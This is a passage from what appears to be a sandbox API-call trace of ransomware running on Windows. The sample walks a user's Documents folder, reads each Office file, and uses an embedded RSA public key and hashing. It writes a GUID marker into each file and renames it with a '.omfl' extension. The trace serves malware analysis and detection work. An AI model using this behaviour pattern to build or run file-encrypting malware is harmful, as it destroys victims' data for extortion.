dwFlags=0x0, lpMem=0x74e3210 | out: hHeap=0x4970000) returned 1 [0130.916] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16e30 | out: hHeap=0x4970000) returned 1 [0130.916] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e78 | out: hHeap=0x4970000) returned 1 [0130.917] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16e18 | out: hHeap=0x4970000) returned 1 [0130.917] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cdb88 | out: hHeap=0x4970000) returned 1 [0130.917] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e58 | out: hHeap=0x4970000) returned 1 [0130.917] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16968 | out: hHeap=0x4970000) returned 1 [0130.917] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9278 | out: hHeap=0x4970000) returned 1 [0130.917] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd08ea8 | out: hHeap=0x4970000) returned 1 [0130.917] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd20488 | out: hHeap=0x4970000) returned 1 [0130.917] GetCurrentThreadId () returned 0x618 [0130.917] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24260 [0130.917] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x82) returned 0x49d68b0 [0130.917] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x2c) returned 0x750cb28 [0130.917] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d3088 [0130.917] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x148) returned 0xdd17560 [0130.917] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e58 [0130.917] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e78 [0130.917] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24680 [0130.917] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0130.917] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0130.917] GetCurrentThreadId () returned 0x618 [0130.917] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0130.917] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0130.917] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xeb) returned 0x74e3210 [0130.917] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0130.917] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0130.917] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0130.917] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0130.917] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e3210 | out: hHeap=0x4970000) returned 1 [0130.917] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24368 [0130.917] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e58 | out: hHeap=0x4970000) returned 1 [0130.918] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4c) returned 0x757ca08 [0130.918] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e58 [0130.918] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24788 [0130.918] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e98 [0130.918] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16968 [0130.918] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e98 | out: hHeap=0x4970000) returned 1 [0130.918] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e98 [0130.918] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8e0 [0130.918] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa890 [0130.918] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8c0 [0130.918] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8a0 [0130.918] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa860 [0130.918] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8b0 [0130.918] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16e18 [0130.918] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8e0 | out: hHeap=0x4970000) returned 1 [0130.918] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0xdcfa8e0 [0130.918] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e98 | out: hHeap=0x4970000) returned 1 [0130.918] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e98 [0130.918] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8f0 [0130.918] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa900 [0130.918] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8d0 [0130.918] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd16e30 [0130.918] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa900 | out: hHeap=0x4970000) returned 1 [0130.918] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x18) returned 0x74cdb88 [0130.918] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8f0 | out: hHeap=0x4970000) returned 1 [0130.918] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16e00 [0130.918] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8d0 | out: hHeap=0x4970000) returned 1 [0130.918] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd16a40 [0130.918] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e98 | out: hHeap=0x4970000) returned 1 [0130.919] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0x7481e98 [0130.919] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa860 | out: hHeap=0x4970000) returned 1 [0130.919] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16848 [0130.919] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e98 | out: hHeap=0x4970000) returned 1 [0130.919] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd167e8 [0130.919] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa890 | out: hHeap=0x4970000) returned 1 [0130.919] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd16e48 [0130.919] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16848 | out: hHeap=0x4970000) returned 1 [0130.919] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd16848 [0130.919] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd167e8 | out: hHeap=0x4970000) returned 1 [0130.919] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0xdcfa890 [0130.919] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e58 | out: hHeap=0x4970000) returned 1 [0130.919] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x14) returned 0x74cf128 [0130.919] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa890 | out: hHeap=0x4970000) returned 1 [0130.919] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1c) returned 0xdce9278 [0130.919] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16e18 | out: hHeap=0x4970000) returned 1 [0130.919] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd16e18 [0130.919] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8e0 | out: hHeap=0x4970000) returned 1 [0130.919] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x204) returned 0xdd20488 [0130.920] SetFilePointerEx (in: hFile=0x5c8, liDistanceToMove=0x16b65, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0130.920] WriteFile (in: hFile=0x5c8, lpBuffer=0xdd24260*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0xdd24260*, lpNumberOfBytesWritten=0xe00fb50*=0x100, lpOverlapped=0x0) returned 1 [0130.920] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0130.920] WriteFile (in: hFile=0x5c8, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0xe00fb50*=0x26, lpOverlapped=0x0) returned 1 [0130.921] CloseHandle (hObject=0x5c8) returned 1 [0130.923] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x70) returned 0x74d2e60 [0130.923] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x880) returned 0xdd29950 [0130.923] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KQRa3iC.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kqra3ic.pptx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KQRa3iC.pptx.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kqra3ic.pptx.omfl")) returned 1 [0130.925] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1fb71b20, ftCreationTime.dwHighDateTime=0x1d5e4cd, ftLastAccessTime.dwLowDateTime=0x417a4560, ftLastAccessTime.dwHighDateTime=0x1d5cf16, ftLastWriteTime.dwLowDateTime=0x417a4560, ftLastWriteTime.dwHighDateTime=0x1d5cf16, nFileSizeHigh=0x0, nFileSizeLow=0x1476f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="mKl8Sc xVyIW nq9Go.xlsx", cAlternateFileName="MKL8SC~1.XLS")) returned 1 [0130.925] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5d58 [0130.925] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8e) returned 0xdd14728 [0130.926] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mKl8Sc xVyIW nq9Go.xlsx") returned=".xlsx" [0130.926] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mKl8Sc xVyIW nq9Go.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\mkl8sc xvyiw nq9go.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5c8 [0130.926] GetFileSizeEx (in: hFile=0x5c8, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=83823) returned 1 [0130.926] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0130.929] SetFilePointerEx (in: hFile=0x5c8, liDistanceToMove=0x14749, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0130.929] ReadFile (in: hFile=0x5c8, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0xe00fb78, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb78*=0x26, lpOverlapped=0x0) returned 1 [0130.930] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb98 [0130.930] ReadFile (in: hFile=0x5c8, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0xe00fb70, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb70*=0x1476f, lpOverlapped=0x0) returned 1 [0130.931] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0130.931] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1ef) returned 0xdd0bd00 [0130.931] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0130.931] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0130.931] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d3088) returned 1 [0130.933] CryptCreateHash (in: hProv=0x49d3088, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0130.933] CryptHashData (hHash=0xdce3a70, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0130.933] CryptGetHashParam (in: hHash=0xdce3a70, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0130.933] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x11) returned 0x74cdf28 [0130.933] CryptGetHashParam (in: hHash=0xdce3a70, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0130.933] GetLastError () returned 0x0 [0130.933] CryptDestroyHash (hHash=0xdce3a70) returned 1 [0130.933] CryptReleaseContext (hProv=0x49d3088, dwFlags=0x0) returned 1 [0130.933] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0130.933] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0130.933] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb60 [0130.933] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0130.934] RtlReAllocateHeap (Heap=0x4970000, Flags=0x0, Ptr=0xdd27968, Size=0x218) returned 0xdd20488 [0130.934] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x558) returned 0xdce69c8 [0130.935] SetFilePointerEx (in: hFile=0x5c8, liDistanceToMove=0x1476f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0130.935] WriteFile (in: hFile=0x5c8, lpBuffer=0xdd24260*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0xdd24260*, lpNumberOfBytesWritten=0xe00fb50*=0x100, lpOverlapped=0x0) returned 1 [0130.935] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0130.935] WriteFile (in: hFile=0x5c8, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0xe00fb50*=0x26, lpOverlapped=0x0) returned 1 [0130.935] CloseHandle (hObject=0x5c8) returned 1 [0130.937] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d3088 [0130.938] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x890) returned 0xdd29950 [0130.938] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mKl8Sc xVyIW nq9Go.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\mkl8sc xvyiw nq9go.xlsx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mKl8Sc xVyIW nq9Go.xlsx.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\mkl8sc xvyiw nq9go.xlsx.omfl")) returned 1 [0130.940] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x290dda00, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x290dda00, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x290dda00, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Music", cAlternateFileName="MYMUSI~1")) returned 1 [0130.940] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x70) returned 0x74d2e60 [0130.940] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x70) returned 0x74d2cf8 [0130.940] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x70) returned 0x74d2de8 [0130.940] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x290dda00, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x290dda00, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x290dda00, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Pictures", cAlternateFileName="MYPICT~1")) returned 1 [0130.940] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x70) returned 0x74d2e60 [0130.940] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x70) returned 0x74d2cf8 [0130.940] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xfc) returned 0xdd24260 [0130.940] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5d58 [0130.940] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5fc8 [0130.940] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5f60 [0130.940] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x70) returned 0x74d2c08 [0130.940] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d3088 [0130.940] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x70) returned 0x74d2c80 [0130.940] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x9e9e4460, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Shapes", cAlternateFileName="MYSHAP~1")) returned 1 [0130.940] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x70) returned 0x74d2e60 [0130.940] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x70) returned 0x74d2cf8 [0130.941] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x70) returned 0x74d2d70 [0130.941] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x290dda00, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x290dda00, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x290dda00, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Videos", cAlternateFileName="MYVIDE~1")) returned 1 [0130.941] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x70) returned 0x74d2e60 [0130.941] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x70) returned 0x74d2cf8 [0130.941] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x70) returned 0x74d28c0 [0130.941] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9f588fd0, ftCreationTime.dwHighDateTime=0x1d58820, ftLastAccessTime.dwLowDateTime=0x6992aae0, ftLastAccessTime.dwHighDateTime=0x1d5691f, ftLastWriteTime.dwLowDateTime=0x6992aae0, ftLastWriteTime.dwHighDateTime=0x1d5691f, nFileSizeHigh=0x0, nFileSizeLow=0x1185b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ng8zuNrApbC E.xlsx", cAlternateFileName="NG8ZUN~1.XLS")) returned 1 [0130.941] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5b50 [0130.941] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8e) returned 0xdd14728 [0130.941] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ng8zuNrApbC E.xlsx") returned=".xlsx" [0130.941] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ng8zuNrApbC E.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ng8zunrapbc e.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5c8 [0130.941] GetFileSizeEx (in: hFile=0x5c8, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=71771) returned 1 [0130.941] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0130.945] SetFilePointerEx (in: hFile=0x5c8, liDistanceToMove=0x11835, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0130.945] ReadFile (in: hFile=0x5c8, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0xe00fb78, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb78*=0x26, lpOverlapped=0x0) returned 1 [0130.946] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb98 [0130.946] ReadFile (in: hFile=0x5c8, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0xe00fb70, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb70*=0x1185b, lpOverlapped=0x0) returned 1 [0130.947] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0130.947] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1ef) returned 0xdd0bd00 [0130.947] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0130.947] lstrlenA (lpString="-----BEGIN PUBLIC 